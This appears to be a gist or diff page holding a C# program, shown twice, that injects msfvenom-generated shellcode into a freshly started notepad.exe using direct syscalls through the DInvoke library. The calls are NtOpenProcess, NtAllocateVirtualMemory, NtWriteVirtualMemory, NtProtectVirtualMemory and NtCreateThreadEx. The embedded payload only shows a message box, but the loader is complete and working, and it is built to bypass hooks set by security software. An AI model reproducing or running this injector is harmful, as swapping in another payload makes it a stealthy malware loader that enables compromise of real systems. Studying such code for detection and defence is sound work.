ChoiSG · May 7, 2021 18:37
diff --git a/dinvokeSyscall.cs b/dinvokeSyscall.cs
 using System;
 using DInvoke;
 using System.Diagnostics;
 using System.Runtime.InteropServices;
 using DynamicInvoke = DInvoke.DynamicInvoke;
 using Data = DInvoke.Data;

 namespace dinvokeSyscall
 {
    class Program
    {
        static void Main(string[] args)
        {
            // msfvenom MesssageBox - msfvenom -c messageBox -a x64 --platform windows -p windows/x64/messagebox TEXT="Malicious Program incoming" -f csharp
            byte[] buf = new byte[305] {
            0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
            0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
            0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
            0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
            0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
            0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
            0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
            0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
            0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
            0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
            0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
            0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
            0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
            0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
            0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
            0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
            0x85,0x19,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
            0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x4d,0x61,0x6c,
            0x69,0x63,0x69,0x6f,0x75,0x73,0x20,0x50,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,
            0x69,0x6e,0x63,0x6f,0x6d,0x69,0x6e,0x67,0x00,0x4d,0x65,0x73,0x73,0x61,0x67,
            0x65,0x42,0x6f,0x78,0x00 };

            byte[] sc = buf;

            var process = Process.Start("C:\\Windows\\System32\\notepad.exe");
            var pid = (uint)process.Id;
            Console.WriteLine("[+] Notepad pid: " + pid);

            IntPtr stub = DynamicInvoke.Generic.GetSyscallStub("NtOpenProcess");
            DELEGATES.NtOpenProcess NtOpenProcessSyscall = (DELEGATES.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtOpenProcess));

            IntPtr procHandle = IntPtr.Zero;
            Data.Native.OBJECT_ATTRIBUTES oa = new Data.Native.OBJECT_ATTRIBUTES();
            Data.Native.CLIENT_ID ci = new Data.Native.CLIENT_ID();
            ci.UniqueProcess = (IntPtr)pid;

            NtOpenProcessSyscall(ref procHandle, Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS, ref oa, ref ci);

            stub = DynamicInvoke.Generic.GetSyscallStub("NtAllocateVirtualMemory");
            IntPtr baseAddress = IntPtr.Zero;
            UInt32 regionSize = (UInt32)sc.Length;

            DELEGATES.NtAllocateVirtualMemory NtAllocateVirtualMemorySyscall= (DELEGATES.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtAllocateVirtualMemory));

            NtAllocateVirtualMemorySyscall(procHandle, ref baseAddress, (UInt32)0, ref regionSize, (UInt32)0x00001000 | (UInt32)0x00002000, (UInt32)0x04);

            Console.WriteLine("[+] Allocated memory addr: 0x" + baseAddress.ToInt64().ToString("x2"));

            stub = DynamicInvoke.Generic.GetSyscallStub("NtWriteVirtualMemory");
            UInt32 bufferLength = (UInt32)sc.Length;
            DELEGATES.NtWriteVirtualMemory NtWriteVirtualMemorySyscall = (DELEGATES.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtWriteVirtualMemory));
            NtWriteVirtualMemorySyscall(procHandle, baseAddress, Marshal.UnsafeAddrOfPinnedArrayElement(sc, 0), bufferLength, ref bufferLength);

            stub = DynamicInvoke.Generic.GetSyscallStub("NtProtectVirtualMemory");
            UInt32 oldProtect = (UInt32)0;
            IntPtr regionSizePtr = (IntPtr)sc.Length;
            DELEGATES.NtProtectVirtualMemory NtProtectVirtualMemorySyscall = (DELEGATES.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtProtectVirtualMemory));
            NtProtectVirtualMemorySyscall(procHandle, ref baseAddress, ref regionSizePtr, (UInt32)0x20, ref oldProtect);

            stub = DynamicInvoke.Generic.GetSyscallStub("NtCreateThreadEx");
            DELEGATES.NtCreateThreadEx NtCreateThreadExSyscall = (DELEGATES.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtCreateThreadEx));
            NtCreateThreadExSyscall(out IntPtr threadHeandle, Data.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, procHandle, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);

            Console.WriteLine("[+] Starting Remote Thread");

        }
    }

    public class DELEGATES
    {
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate Data.Native.NTSTATUS NtOpenProcess(ref IntPtr ProcessHandle, Data.Win32.Kernel32.ProcessAccessFlags AccessMask, ref Data.Native.OBJECT_ATTRIBUTES ObjectAttributes, ref Data.Native.CLIENT_ID ClientId);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate Data.Native.NTSTATUS NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, UInt32 ZeroBits, ref UInt32 RegionSize, UInt32 AllocationType, UInt32 Protect);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate UInt32 NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr Buffer, UInt32 BufferLength, ref UInt32 BytesWritten);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate Data.Native.NTSTATUS NtCreateThreadEx(out IntPtr threadHandle, Data.Win32.WinNT.ACCESS_MASK desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, IntPtr attributeList);

    }

 }
	using System;
	using DInvoke;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using DynamicInvoke = DInvoke.DynamicInvoke;
	using Data = DInvoke.Data;

	namespace dinvokeSyscall
	{
	class Program
	{
	static void Main(string[] args)
	{
	// msfvenom MesssageBox - msfvenom -c messageBox -a x64 --platform windows -p windows/x64/messagebox TEXT="Malicious Program incoming" -f csharp
	byte[] buf = new byte[305] {
	0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
	0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
	0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
	0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
	0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
	0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
	0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
	0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
	0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
	0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
	0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
	0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
	0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
	0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
	0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
	0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
	0x85,0x19,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
	0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x4d,0x61,0x6c,
	0x69,0x63,0x69,0x6f,0x75,0x73,0x20,0x50,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,
	0x69,0x6e,0x63,0x6f,0x6d,0x69,0x6e,0x67,0x00,0x4d,0x65,0x73,0x73,0x61,0x67,
	0x65,0x42,0x6f,0x78,0x00 };

	byte[] sc = buf;

	var process = Process.Start("C:\\Windows\\System32\\notepad.exe");
	var pid = (uint)process.Id;
	Console.WriteLine("[+] Notepad pid: " + pid);

	IntPtr stub = DynamicInvoke.Generic.GetSyscallStub("NtOpenProcess");
	DELEGATES.NtOpenProcess NtOpenProcessSyscall = (DELEGATES.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtOpenProcess));

	IntPtr procHandle = IntPtr.Zero;
	Data.Native.OBJECT_ATTRIBUTES oa = new Data.Native.OBJECT_ATTRIBUTES();
	Data.Native.CLIENT_ID ci = new Data.Native.CLIENT_ID();
	ci.UniqueProcess = (IntPtr)pid;

	NtOpenProcessSyscall(ref procHandle, Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS, ref oa, ref ci);

	stub = DynamicInvoke.Generic.GetSyscallStub("NtAllocateVirtualMemory");
	IntPtr baseAddress = IntPtr.Zero;
	UInt32 regionSize = (UInt32)sc.Length;

	DELEGATES.NtAllocateVirtualMemory NtAllocateVirtualMemorySyscall= (DELEGATES.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtAllocateVirtualMemory));

	NtAllocateVirtualMemorySyscall(procHandle, ref baseAddress, (UInt32)0, ref regionSize, (UInt32)0x00001000 \| (UInt32)0x00002000, (UInt32)0x04);

	Console.WriteLine("[+] Allocated memory addr: 0x" + baseAddress.ToInt64().ToString("x2"));

	stub = DynamicInvoke.Generic.GetSyscallStub("NtWriteVirtualMemory");
	UInt32 bufferLength = (UInt32)sc.Length;
	DELEGATES.NtWriteVirtualMemory NtWriteVirtualMemorySyscall = (DELEGATES.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtWriteVirtualMemory));
	NtWriteVirtualMemorySyscall(procHandle, baseAddress, Marshal.UnsafeAddrOfPinnedArrayElement(sc, 0), bufferLength, ref bufferLength);

	stub = DynamicInvoke.Generic.GetSyscallStub("NtProtectVirtualMemory");
	UInt32 oldProtect = (UInt32)0;
	IntPtr regionSizePtr = (IntPtr)sc.Length;
	DELEGATES.NtProtectVirtualMemory NtProtectVirtualMemorySyscall = (DELEGATES.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtProtectVirtualMemory));
	NtProtectVirtualMemorySyscall(procHandle, ref baseAddress, ref regionSizePtr, (UInt32)0x20, ref oldProtect);

	stub = DynamicInvoke.Generic.GetSyscallStub("NtCreateThreadEx");
	DELEGATES.NtCreateThreadEx NtCreateThreadExSyscall = (DELEGATES.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtCreateThreadEx));
	NtCreateThreadExSyscall(out IntPtr threadHeandle, Data.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, procHandle, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);

	Console.WriteLine("[+] Starting Remote Thread");

	}
	}

	public class DELEGATES
	{
	[UnmanagedFunctionPointer(CallingConvention.StdCall)]
	public delegate Data.Native.NTSTATUS NtOpenProcess(ref IntPtr ProcessHandle, Data.Win32.Kernel32.ProcessAccessFlags AccessMask, ref Data.Native.OBJECT_ATTRIBUTES ObjectAttributes, ref Data.Native.CLIENT_ID ClientId);

	[UnmanagedFunctionPointer(CallingConvention.StdCall)]
	public delegate Data.Native.NTSTATUS NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, UInt32 ZeroBits, ref UInt32 RegionSize, UInt32 AllocationType, UInt32 Protect);

	[UnmanagedFunctionPointer(CallingConvention.StdCall)]
	public delegate UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect);

	[UnmanagedFunctionPointer(CallingConvention.StdCall)]
	public delegate UInt32 NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr Buffer, UInt32 BufferLength, ref UInt32 BytesWritten);

	[UnmanagedFunctionPointer(CallingConvention.StdCall)]
	public delegate Data.Native.NTSTATUS NtCreateThreadEx(out IntPtr threadHandle, Data.Win32.WinNT.ACCESS_MASK desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, IntPtr attributeList);

	}

	}